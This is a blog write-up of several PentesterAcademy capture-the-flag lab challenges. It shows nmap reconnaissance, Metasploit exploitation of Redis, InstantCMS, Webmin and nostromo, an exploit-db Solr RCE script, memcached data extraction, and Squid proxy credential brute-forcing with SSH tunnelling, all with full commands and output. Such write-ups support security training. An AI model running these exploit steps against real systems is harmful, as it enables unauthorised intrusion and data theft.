PentestAcademy ctf.live

Thanks to my early return from an overseas excercise, I’m stuck at home for two weeks. As such, I figured I might as well take a swing at the free CTF put on by PentesterAcademy, ctf.live.

Metasploit Challenges

  1. Vulnerable Database
  2. Vulnerable CMS
  3. Backdoored System Manager Tool
  4. Vulnerable Web Server
  5. Vulnerable Search Platform

Network Challenges

  1. Abusing Proxy Server
  2. Caching Server

Conclusion

Metasploit

Presumably, all of these challenges involve the use of capabilities provided inside of the Metasploit framework.

Vulnerable Database

The target server is running an outdated database server that is vulnerable to a publicly known vulnerability. While making some configuration changes, by mistake the admin has exposed this database to the external machines. In this challenge, the attacker has to fingerprint the database and exploit it using the appropriate Metasploit module.

Easy enough. My methodology going in will be to banner-grab the database server using nmap, then use searchsploit to find the relevant module. From there, I’ll pick an appropriate payload to find the flag on the box.

root@attackdefense:~# nmap -sV 192.8.72.3
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:01 IST
Nmap scan report for target-1 (192.8.72.3)
Host is up (0.000014s latency).
All 1000 scanned ports on target-1 (192.8.72.3) are closed
MAC Address: 02:42:C0:08:48:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds

Well, that’s unfortunate. It seems every port is closed. The detail oriented, however, will recall that nmap only scans the 1000 most frequently seen ports by default. Since the host did respond to an ICMP ping, it is incredibly unlikely that it is listening on no ports, so I told NMAP to scan all ports (including 0).

root@attackdefense:~# nmap -sV 192.8.72.3 -p 0-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:01 IST
Nmap scan report for target-1 (192.8.72.3)
Host is up (0.000015s latency).
Not shown: 65535 closed ports
PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.8
MAC Address: 02:42:C0:08:48:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.08 seconds

That’s more like it.

msf5 > search Redis

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  auxiliary/gather/ibm_bigfix_sites_packages_enum           2019-03-18       normal     No     IBM BigFix Relay Server Sites and Package Enum
   1  auxiliary/scanner/redis/file_upload                       2015-11-11       normal     No     Redis File Upload
   2  auxiliary/scanner/redis/redis_login                                        normal     No     Redis Login Utility
   3  auxiliary/scanner/redis/redis_server                                       normal     No     Redis Command Execute Scanner
   4  exploit/linux/redis/redis_unauth_exec                     2018-11-13       good       No     Redis Unauthenticated Code Execution
...

Using the exploit/linux/redis/redis_unauth_exec module, and the default meterpreter payload, getting the flag is as easy as setting the right options and hitting run.

msf5 exploit(linux/redis/redis_unauth_exec) > set lhost 192.8.72.2
lhost => 192.8.72.2
msf5 exploit(linux/redis/redis_unauth_exec) > set srvhost 192.8.72.2
srvhost => 192.8.72.2
msf5 exploit(linux/redis/redis_unauth_exec) > run
...
meterpreter > ls
Listing: /root
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  3106   fil   2020-04-02 22:22:21 +0530  .bashrc
40700/rwx------   4096   dir   2020-04-02 22:22:37 +0530  .cache
100644/rw-r--r--  148    fil   2020-04-02 22:22:21 +0530  .profile
100644/rw-r--r--  33     fil   2020-04-02 22:22:37 +0530  flag
100644/rw-r--r--  46808  fil   2020-04-06 23:11:22 +0530  xbsc.so

meterpreter > cat flag
829ea1f5a92580f0484cd32a6ef09d25

Vulnerable CMS

The target machine is running an outdated Content Management System (CMS) which is vulnerable to a publicly known vulnerability. In this challenge, the attacker has to fingerprint the CMS and exploit it using the appropriate Metasploit module.

Same as before, my methodology will be to conduct reconaissance, find and weaponize an exploit, and deliver a payload. This time, though, I needed to leverage nmap’s scripting engine, using the -A flag to specify to use the default scripts and also perform a banner grab.

root@attackdefense:~# nmap -A 192.7.230.3
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:16 IST
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for target-1 (192.7.230.3)
Host is up (0.000087s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-generator: InstantCMS - www.instantcms.ru
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: InstantCMS 1.6.2
...

Booting up the Metasploit console, it’s trivial to find the right exploit.

msf5 > search InstantCMS

Matching Modules
================

   #  Name                                 Disclosure Date  Rank       Check  Description
   -  ----                                 ---------------  ----       -----  -----------
   0  exploit/unix/webapp/instantcms_exec  2013-06-26       excellent  Yes    InstantCMS 1.6 Remote PHP Code Execution

As before, setting the appropriate options and firing it off is enough to get the flag.

msf5 exploit(unix/webapp/instantcms_exec) > set rhost 192.7.230.3
rhost => 192.7.230.3
msf5 exploit(unix/webapp/instantcms_exec) > set lhost 192.7.230.2
lhost => 192.7.230.2
msf5 exploit(unix/webapp/instantcms_exec) > run

[*] Started reverse TCP handler on 192.7.230.2:4444 
[*] Executing payload...
[*] Sending stage (38288 bytes) to 192.7.230.3
[*] Meterpreter session 1 opened (192.7.230.2:4444 -> 192.7.230.3:42126) at 2020-04-06 23:18:53 +0530

meterpreter > ls
Listing: /var/www/html
======================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  517    fil   2010-04-30 23:46:26 +0530  .htaccess
100644/rw-r--r--  33     fil   2020-04-01 16:01:06 +0530  THIS_IS_FLAG31231234555
40777/rwxrwxrwx   4096   dir   2010-05-16 01:12:44 +0530  admin
40777/rwxrwxrwx   4096   dir   2010-05-16 01:12:44 +0530  backups
40777/rwxrwxrwx   4096   dir   2020-03-11 21:16:09 +0530  cache
40777/rwxrwxrwx   4096   dir   2010-07-17 20:17:26 +0530  components
40777/rwxrwxrwx   4096   dir   2010-05-17 18:15:34 +0530  core
40777/rwxrwxrwx   4096   dir   2010-05-16 01:12:46 +0530  filters
40777/rwxrwxrwx   4096   dir   2010-05-16 01:12:46 +0530  images
40777/rwxrwxrwx   4096   dir   2020-03-11 21:15:22 +0530  includes
100777/rwxrwxrwx  5719   fil   2010-05-06 19:18:54 +0530  index.php
40777/rwxrwxrwx   4096   dir   2010-05-16 01:17:44 +0530  install_
40777/rwxrwxrwx   4096   dir   2010-07-17 20:18:00 +0530  languages
100777/rwxrwxrwx  40191  fil   2010-04-23 20:21:10 +0530  license.rus.utf.txt
100777/rwxrwxrwx  23209  fil   2010-04-23 20:21:12 +0530  license.rus.win.txt
100777/rwxrwxrwx  17987  fil   2010-04-23 20:21:10 +0530  license.txt
40777/rwxrwxrwx   4096   dir   2010-05-16 01:12:46 +0530  migrate_
40777/rwxrwxrwx   4096   dir   2010-05-16 01:12:46 +0530  modules
40777/rwxrwxrwx   4096   dir   2010-05-16 01:12:46 +0530  plugins
100777/rwxrwxrwx  1549   fil   2010-04-23 20:21:12 +0530  readme.txt
40777/rwxrwxrwx   4096   dir   2010-07-17 20:18:28 +0530  templates
40777/rwxrwxrwx   4096   dir   2010-05-16 01:12:46 +0530  upload
100777/rwxrwxrwx  10726  fil   2010-05-16 01:17:44 +0530  url_rewrite.php
100777/rwxrwxrwx  51376  fil   2010-05-16 01:17:44 +0530  version_log.txt

meterpreter > cat THIS_IS_FLAG31231234555
6cc438c37e36a57afc61279167ebeb82

Backdoored System Manager Tool

The target server is running a system management tool that contains a publicly known backdoor. In this challenge, the attacker has to fingerprint the system management tool and exploit it using the appropriate Metasploit module.

Just as you might expect by now, I’ll be conducting reconaissance, finding and weaponizing an exploit, then delivering a payload. As before, I’ll utilize the nmap scripting engine to fingerprint the tool. One addition is the -F flag, which tells nmap to only scan the top 100 ports, instead of the default top 1000.

root@attackdefense:~# nmap -AF 192.102.234.3 
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:23 IST
Nmap scan report for target-1 (192.102.234.3)
Host is up (0.000056s latency).
Not shown: 99 closed ports
PORT      STATE SERVICE VERSION
10000/tcp open  http    MiniServ 1.920 (Webmin httpd)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Login to Webmin

Searching for Webmin exploits inside the Metasploit framework finds us one backdoor exploit from 2019.

msf5 > search webmin

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_backdoor           2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor
...

Using this exploit, we get a partially-interactive shell, which I then upgrade using the Python pty method.

msf5 exploit(linux/http/webmin_backdoor) > set lhost 192.102.234.2
lhost => 192.102.234.2
msf5 exploit(linux/http/webmin_backdoor) > set srvhost 192.102.234.2
srvhost => 192.102.234.2
msf5 exploit(linux/http/webmin_backdoor) > run
...

id
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty; pty.spawn("/bin/bash")'
root@victim-1:/webmin/acl# 

Using find, I quickly discover where our flag is.

root@victim-1:/webmin/acl# find / -xdev -name *flag
/root/flag
root@victim-1:/webmin/acl# cat /root/flag
b3be8fa61b04f25ae1b36da42f37269a

Vulnerable Web Server

The target server is running an outdated web server that is vulnerable to a publicly known vulnerability. In this challenge, the attacker has to fingerprint the webserver and then exploit it using the appropriate Metasploit module.

For this challenge, I shouldn’t need to do any script scanning, since I’ll be directly exploiting the server itself.

root@attackdefense:~# nmap 192.38.176.3 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:46 IST
Nmap scan report for target-1 (192.38.176.3)
Host is up (0.000015s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nostromo 1.9.5

Metasploit has the following exploit.

msf5 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

Running the exploit, upgrading the shell, finding the flag and reading it is fairly straightforward.

python -c 'import pty; pty.spawn("/bin/bash")'
admin@victim-1:/bin$ find / -xdev -name *flag
find / -xdev -name *flag
find: '/var/cache/apt/archives/partial': Permission denied
find: '/var/cache/ldconfig': Permission denied
find: '/var/lib/apt/lists/partial': Permission denied
find: '/root': Permission denied
find: '/etc/ssl/private': Permission denied
/flag
admin@victim-1:/bin$ cat /flag
cat /flag
c3b940013b8b52573f4615d5236bbe3d

Vulnerable Search Platform

The target server is running an outdated enterprise search platform that is vulnerable to a publicly known vulnerability. In this challenge, the attacker has to fingerprint the search platform and exploit it using the appropriate Metasploit module.

As always, I’ll be using nmap for recon, searching the Metasploit framework for an exploit, then using whatever the exploit’s standard payload is.

root@attackdefense:~# nmap -sV 192.38.186.3 -p 0-65535  
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:54 IST
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for target-1 (192.38.186.3)
Host is up (0.000014s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE     VERSION
8983/tcp  open  http        Apache Solr
18983/tcp open  rmiregistry Java RMI
41399/tcp open  rmiregistry Java RMI

Now, to find an exploit.

root@attackdefense:~# searchsploit Solr
--------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                 |  Path
                                                                                                               | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution                                      | exploits/xml/webapps/43009.txt
Apache Solr 8.2.0 - Remote Code Execution                                                                      | exploits/java/webapps/47572.py
Solr 3.5.0 - Arbitrary Data Deletion                                                                           | exploits/java/webapps/39418.txt
--------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Note that this exploit is not inside of the metasploit framework. Using this exploit directly from the command line, we can find and read the flag.

root@attackdefense:~# python3 /usr/share/exploitdb/exploits/java/webapps/47572.py 192.38.186.3 8983 "find / -xdev -name *flag"
...
Init node db Successfully, exec command=find / -xdev -name *flag
RCE Successfully @Apache Solr node db
   /flag
...
root@attackdefense:~# python3 /usr/share/exploitdb/exploits/java/webapps/47572.py 192.38.186.3 8983 "cat /flag"
...
Init node db Successfully, exec command=cat /flag
RCE Successfully @Apache Solr node db
   1ba0fa89d14e9b1e74a88160dc0d85af
...

Network

All of these challenges involve the indirect exploitation of network facing servers. Sounds fun enough.

Caching Server

Over the past years, caching servers have played a crucial role in speeding up the content served by the webservers. In most cases, caching servers are deployed on the internal network and are not protected with authentication. In this challenge, the attacker has managed to sneak into the internal network and can interact with the caching server. Please answer the following questions:

  1. How many key-value pairs are stored on the caching server?
  2. Find the value stored in key “api-key” on the caching server.
  3. Find the name of the key which is present in the warm cache of the caching server.

Off-hand, the references to key-value pairs and different layers of cache make me think that this challenge uses Redis or Memcached, but I will use nmap to confirm this hypothesis.

root@attackdefense:~# nmap -sV 192.179.78.3 -p 0-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-07 01:30 IST
Nmap scan report for target-1 (192.179.78.3)
Host is up (0.000014s latency).
Not shown: 65535 closed ports
PORT      STATE SERVICE   VERSION
11211/tcp open  memcached Memcached 1.5.12 (uptime 204 seconds)

Memcached it is. Luckily for us, libmemcached is installed, as discovered using apropos.

root@attackdefense:~# apropos memcached
memcached (1)        - high-performance memory object caching system
memcaslap (1)        - libmemcached Documentation
memccapable (1)      - libmemcached Documentation
memccat (1)          - libmemcached Documentation
memccp (1)           - libmemcached Documentation
memcdump (1)         - libmemcached Documentation
memcerror (1)        - libmemcached Documentation
memcexist (1)        - libmemcached Documentation
memcflush (1)        - libmemcached Documentation
memcparse (1)        - libmemcached Documentation
memcping (1)         - libmemcached Documentation
memcrm (1)           - libmemcached Documentation
memcslap (1)         - libmemcached Documentation
memcstat (1)         - libmemcached Documentation
memctouch (1)        - libmemcached Documentation

Using memcstat, getting the total number of pairs is simple.

oot@attackdefense:~# memcstat --servers=192.179.78.3
Server: 192.179.78.3 (11211)
	 pid: 7
	 uptime: 274
	 time: 1586203318
	 version: 1.5.12
	 libevent: 2.0.21-stable
...
	 curr_items: 15
	 total_items: 42
...

Note that while you might think that total_items would be the correct answer, only the items in curr_items are actuall stored on the server right now.

Moving on, I used memccat to get the value for the api-key key.

root@attackdefense:~# memccat --servers=192.179.78.3 api-key
0c50e7e8b66421217aa39e2286c2d5df

Now, the last question is slightly more tricky. In order to determine which key was in the warm-cache, I connected to the memcached server via telnet and set the timeout of every value to 20 seconds, giving whatever script was keeping the target value warm plenty of time to re-query.

set userCount 0 15 1
95
STORED
set email 0 15 23 
admin@recon-badge.local
STORED
...

After waiting about a minute, only one key remained:

stats cachedump 1 0
ITEM userCount [2 b; 0 s]
END
get userCount
VALUE userCount 4 2
95

Counter to the prompt, 95 is the answer to the question, not the name of the key.

Abusing Proxy Server

IP whitelisting is a common method of limiting access only to trusted users. In this challenge, there are two target machines (machine A and machine B). The attacker is provided with phished SSH credentials of machine B. But, the SSH server is configured only to allow sessions from a specific machine (i.e. machine A). Objective: You have to SSH into the machine B and retrieve the flag!

Also included further down in the prompt is the following information:

You can use corkscrew tool (available on the attacker machine) to solve it
Please use Nmap's proxy brute force script with default Nmap dictionaries (given below):
    Username wordlist: /usr/share/nmap/nselib/data/usernames.lst 
    Password wordlist: /usr/share/nmap/nselib/data/passwords.lst

First up, let’s figure out what kind of proxy is running on machine A.

root@attackdefense:~# nmap -A 192.38.44.3 | tee target-a.txt
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-07 03:03 IST
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for target-1 (192.38.44.3)
Host is up (0.000051s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 3.5.12

Now, using the hinted at http-proxy-brute nmap script, let’s brute force that proxy server.

root@attackdefense:~# nmap --script=http-proxy-brute -p 3128 192.38.44.3
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-07 03:07 IST

PORT     STATE SERVICE
3128/tcp open  squid-http
| http-proxy-brute: 
|   Accounts: 
|     root:hello! - Valid credentials
|_  Statistics: Performed 49698 guesses in 38 seconds, average tps: 1644.1
MAC Address: 02:42:C0:26:2C:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 39.16 seconds

Now, given that, I’ll use corkscrew to SSH to machine B via machine A. Thanks to the following example in the manpage for corkscrew, this is easy.

EXAMPLES
       The common usage of corkscrew is to put the following line in
       ~/.ssh/ssh_config:

               ProxyCommand corkscrew proxy proxyport %h %p [<path to auth_file>]

So, I did the following:

root@attackdefense:~# echo "root:hello!" > authfile
root@attackdefense:~# echo "Host *" >> /root/.ssh/ssh_config
root@attackdefense:~# echo "ProxyCommand corkscrew 192.38.44.3 3128 %h %p /root/authfile" >> /root/.ssh/ssh_config
root@attackdefense:~# ssh 192.38.44.4 -F .ssh/ssh_config        
Proxy could not open connection to 192.38.44.4:  Service Unavailable
kex_exchange_identification: Connection closed by remote host

Weird. I guess I should probably make sure that the port I’m trying to connect to is actually open.

root@attackdefense:~# nmap 192.38.44.4 -p 0-65535 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-07 03:17 IST
Nmap scan report for target-2 (192.38.44.4)
Host is up (0.000015s latency).
Not shown: 65535 closed ports
PORT     STATE SERVICE VERSION
4554/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.5 (Ubuntu Linux; protocol 2.0)

Okay, so they set SSH to listen on port 4554. Easy enough:

root@attackdefense:~# ssh 192.38.44.4 -F .ssh/ssh_config -p 4554
root@192.38.44.4's password: 
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Mon Apr  6 21:46:26 2020 from 192.38.44.3
root@victim-1:~# ls
FLAG
root@victim-1:~# cat FLAG 
1678C22AA29A611919DADE0E8B1A1527

Conclusion

While that’s all I had time to do in a day, there’s a bunch more challenges up on the site. This CTF, which it seems is based on the Attack-Defense CTF I beta tested, is well-built and has minimal issues. Thanks to the in-browser VMs, you could concievably do this on any network that lets you browse the internet, and on any device that can run a web browser, which is always a plus. My impression of Pentester Academy only goes up as I interact with more of their products. Who knows, if I decide I want to move into the offensive security space I may purchase a subscription.

Written on April 11, 2020